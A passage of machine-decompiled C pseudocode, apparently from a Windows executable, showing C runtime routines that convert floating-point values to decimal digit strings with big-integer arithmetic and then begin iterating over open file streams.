																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1271 + _t1020 * 4 - 0x1d0) = (_t1224 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1264 = _t1264 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1179 = _v1892;
														_t1221 = _v1872;
														_t1262 = 2;
													}
													__eflags = _t1221;
													if(_t1221 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1221 << 2);
														_t1274 =  &(_t1274[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1179;
													} else {
														_v472 = _t1179 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1262;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1271 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1271 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1266 = _t1023 >> 5;
													_v1876 = _t1266;
													_v1908 = _t1129;
													_t1027 = E00C7F0C0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1182 = _t1266 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1182;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1182 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1182 - 0x00000073 > 0x00000000;
													__eflags = _t1182 - 0x73;
													if(_t1182 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00C8BDE1( &_v468, 0x1cc,  &_v1396, 0);
														_t1274 =  &(_t1274[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1182 - _t1134;
															if(_t1182 >= _t1134) {
																_t1182 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1182;
															_v1892 = _t1135;
															__eflags = _t1182 - 0xffffffff;
															if(_t1182 != 0xffffffff) {
																_t1183 = _v1876;
																_t1268 = _t1182 - _t1183;
																__eflags = _t1268;
																_t1043 =  &_v468 + _t1268 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1183;
																	if(_t1135 < _t1183) {
																		break;
																	}
																	__eflags = _t1268 - _t1061;
																	if(_t1268 >= _t1061) {
																		_t1230 = 0;
																		__eflags = 0;
																	} else {
																		_t1230 =  *_t1043;
																	}
																	__eflags = _t1268 - 1 - _t1061;
																	if(_t1268 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1271 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1230 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1268 = _t1268 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1182 = _v1880;
																_t1266 = _v1876;
															}
															__eflags = _t1266;
															if(_t1266 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1266 << 2);
																_t1274 =  &(_t1274[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1182;
															} else {
																_v472 = _t1182 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E00C8BDE1();
										_t1277 =  &(_t1274[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0xc983dc + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1199 = 0;
															_t1248 = 0;
															__eflags = 0;
															do {
																_t1153 = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) >> 0x20;
																 *(_t1271 + _t1248 * 4 - 0x1d0) = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) + _t1199;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1248 = _t1248 + 1;
																_t1199 = _t1153;
																__eflags = _t1248 - _t1096;
															} while (_t1248 != _t1096);
															__eflags = _t1199;
															if(_t1199 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1271 + _t856 * 4 - 0x1d0) = _t1199;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0xc98346 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0xc98346 + _t812 * 4) & 0x000000ff) + ( *(0xc98347 + _t812 * 4) & 0x000000ff);
												E00C7FFF0(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E00C80320( &(( &_v1396)[_t1097]), 0xc97a40 + ( *(0xc98344 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xc98347 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1202 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1154 =  &_v468;
														} else {
															_t1202 =  &_v468;
															_t1154 =  &_v1396;
														}
														_v1908 = _t1154;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1155 = 0;
														_t1250 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1155;
															_t870 = _t1155 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1203 = _t1202 -  &_v1860;
															__eflags = _t1203;
															_v1928 = _t1203;
															do {
																_t878 =  *(_t1271 + _t1203 + _t1250 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1204 = 0;
																	_t1099 = _t1250;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1203 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1155;
																			if(_t1099 == _t1155) {
																				 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1250;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1204;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1204 = _t886 * _v1896 >> 0x20;
																			_t1155 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1204;
																				if(_t1204 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1155;
																					if(_t1099 == _t1155) {
																						_t558 = _t1271 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1204;
																					_t1204 = 0;
																					 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t884;
																					_t1155 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1250 - _t1155;
																	if(_t1250 == _t1155) {
																		 *(_t1271 + _t1250 * 4 - 0x740) =  *(_t1271 + _t1250 * 4 - 0x740) & _t878;
																		_t526 = _t1250 + 1; // 0x1
																		_t1155 = _t526;
																		_v1864 = _t1155;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1250 = _t1250 + 1;
																__eflags = _t1250 - _t1098;
															} while (_t1250 != _t1098);
															goto L243;
														}
													} else {
														_t1205 = _v468;
														_v472 = _t1098;
														E00C8BDE1( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1205;
														if(_t1205 == 0) {
															goto L203;
														} else {
															__eflags = _t1205 - 1;
															if(_t1205 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1251 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1205;
																		_t1156 = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) >> 0x20;
																		 *(_t1271 + _t1251 * 4 - 0x1d0) = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1251 = _t1251 + 1;
																		_t1100 = _t1156;
																		__eflags = _t1251 - _v1896;
																	} while (_t1251 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1206 = _v1396;
													__eflags = _t1206;
													if(_t1206 != 0) {
														__eflags = _t1206 - 1;
														if(_t1206 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1252 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1206;
																	_t1157 = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) >> 0x20;
																	 *(_t1271 + _t1252 * 4 - 0x1d0) = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1252 = _t1252 + 1;
																	_t1101 = _t1157;
																	__eflags = _t1252 - _v1896;
																} while (_t1252 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00C8BDE1( &_v468, _t1064,  &_v2404, 0);
																		_t1277 =  &(_t1277[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1271 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E00C8BDE1();
														_t1277 =  &(_t1277[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1207 =  *(0xc983dc + _t1102 * 4);
												__eflags = _t1207;
												if(_t1207 != 0) {
													__eflags = _t1207 - 1;
													if(_t1207 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1253 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1207;
																_t1161 = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1271 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) + _t1253;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1253 = _t1161;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1253;
															if(_t1253 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1271 + _t913 * 4 - 0x3a0) = _t1253;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0xc98346 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0xc98346 + _t908 * 4) & 0x000000ff) + ( *(0xc98347 + _t908 * 4) & 0x000000ff);
												E00C7FFF0(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E00C80320( &(( &_v1396)[_t1104]), 0xc97a40 + ( *(0xc98344 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xc98347 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1210 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1162 =  &_v932;
														} else {
															_t1210 =  &_v932;
															_t1162 =  &_v1396;
														}
														_v1876 = _t1162;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1163 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1163;
															_t929 = _t1163 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1211 = _t1210 -  &_v1860;
															__eflags = _t1211;
															_v1928 = _t1211;
															do {
																_t937 =  *(_t1271 + _t1211 + _t1255 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1212 = 0;
																	_t1106 = _t1255;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1211 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1163;
																			if(_t1106 == _t1163) {
																				 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1255;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1212;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1212 = _t945 * _v1884 >> 0x20;
																			_t1163 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1212;
																				if(_t1212 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1163;
																					if(_t1106 == _t1163) {
																						_t370 = _t1271 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1212;
																					_t1212 = 0;
																					 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t943;
																					_t1163 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1255 - _t1163;
																	if(_t1255 == _t1163) {
																		 *(_t1271 + _t1255 * 4 - 0x740) =  *(_t1271 + _t1255 * 4 - 0x740) & _t937;
																		_t338 = _t1255 + 1; // 0x1
																		_t1163 = _t338;
																		_v1864 = _t1163;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1105;
															} while (_t1255 != _t1105);
															goto L177;
														}
													} else {
														_t1213 = _v932;
														_v936 = _t1105;
														E00C8BDE1( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1213;
														if(_t1213 != 0) {
															__eflags = _t1213 - 1;
															if(_t1213 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1213;
																		_t1164 = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) >> 0x20;
																		 *(_t1271 + _t1256 * 4 - 0x3a0) = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1107 = _t1164;
																		__eflags = _t1256 - _v1884;
																	} while (_t1256 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1214 = _v1396;
													__eflags = _t1214;
													if(_t1214 != 0) {
														__eflags = _t1214 - 1;
														if(_t1214 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1214;
																	_t1165 = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) >> 0x20;
																	 *(_t1271 + _t1257 * 4 - 0x3a0) = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1108 = _t1165;
																	__eflags = _t1257 - _v1884;
																} while (_t1257 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1271 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E00C8BDE1();
																		_t1277 =  &(_t1277[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E00C8BDE1();
														_t1277 =  &(_t1277[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E00C8BDE1();
													_t1277 =  &(_t1277[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1194 = _v1920;
									_t1243 = _t1194;
									_t1086 = _v472;
									_v1872 = _t1243;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1247 = 0;
										_t1198 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1271 + _t1198 * 4 - 0x1d0);
											_t1151 = 0xa;
											_t1152 = _t841 * _t1151 >> 0x20;
											 *(_t1271 + _t1198 * 4 - 0x1d0) = _t841 * _t1151 + _t1247;
											asm("adc edx, 0x0");
											_t1198 = _t1198 + 1;
											_t1247 = _t1152;
											__eflags = _t1198 - _t1086;
										} while (_t1198 != _t1086);
										_v1896 = _t1247;
										__eflags = _t1247;
										_t1243 = _v1872;
										if(_t1247 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00C8BDE1( &_v468, _t1064,  &_v2404, 0);
												_t1277 =  &(_t1277[4]);
											} else {
												 *(_t1271 + _t1095 * 4 - 0x1d0) = _t1152;
												_v472 = _v472 + 1;
											}
										}
										_t1194 = _t1243;
									}
									_t815 = E00C8D440( &_v472,  &_v936);
									_t1142 = 0xa;
									__eflags = _t815 - _t1142;
									if(_t815 != _t1142) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1243 = _t1194 + 1;
											 *_t1194 = _t816;
											_v1872 = _t1243;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1243 = _t1194 + 1;
										_t832 = _v936;
										 *_t1194 = 0x31;
										_v1872 = _t1243;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1197 = 0;
											_t1246 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1271 + _t1094 * 4 - 0x3a0);
												 *(_t1271 + _t1094 * 4 - 0x3a0) = _t833 * _t1142 + _t1197;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1197 = _t833 * _t1142 >> 0x20;
												_t1142 = 0xa;
												__eflags = _t1094 - _t1246;
											} while (_t1094 != _t1246);
											_t1243 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00C8BDE1( &_v932, _t1064,  &_v2404, 0);
													_t1277 =  &(_t1277[4]);
												} else {
													 *(_t1271 + _t836 * 4 - 0x3a0) = _t1197;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1243 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1195 = 0;
											_t1244 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1271 + _t1090 * 4 - 0x1d0);
												 *(_t1271 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1195;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1195 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1244;
											} while (_t1090 != _t1244);
											_t1245 = _v1872;
											__eflags = _t1195;
											if(_t1195 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00C8BDE1( &_v468, _t1064,  &_v2404, 0);
													_t1277 =  &(_t1277[4]);
												} else {
													 *(_t1271 + _t826 * 4 - 0x1d0) = _t1195;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E00C8D440( &_v472,  &_v936);
											_t1196 = 8;
											_t1070 = _v1916 - _t1245;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1142 = _t708 + 0x30;
												__eflags = _t1070 - _t1196;
												if(_t1070 >= _t1196) {
													 *(_t1196 + _t1245) = _t1142;
												}
												_t1196 = _t1196 - 1;
												__eflags = _t1196 - 0xffffffff;
											} while (_t1196 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1243 = _t1245 + _t1070;
											_v1872 = _t1243;
											__eflags = _t1243 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1243 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1234 & 0x000fffff;
					if((_t1186 | _t1234 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xc98404);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E00C88D67() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00C89097();
							asm("int3");
							_push(0x10);
							E00C7F5F0(_t1055, _t1186, _t1234);
							_v32 = _v32 & 0x00000000;
							E00C8AC31(8);
							_t1071 = 0xc9c4e8;
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1235 = 3;
							while(1) {
								_v36 = _t1235;
								__eflags = _t1235 -  *0xcc2274; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0xcc2278; // 0x0
								_t764 =  *(_t763 + _t1235 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0xcc2278; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1235 * 4)));
										_t774 = E00C90023(_t1055, _t1071, _t1142, _t1186, _t1235, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
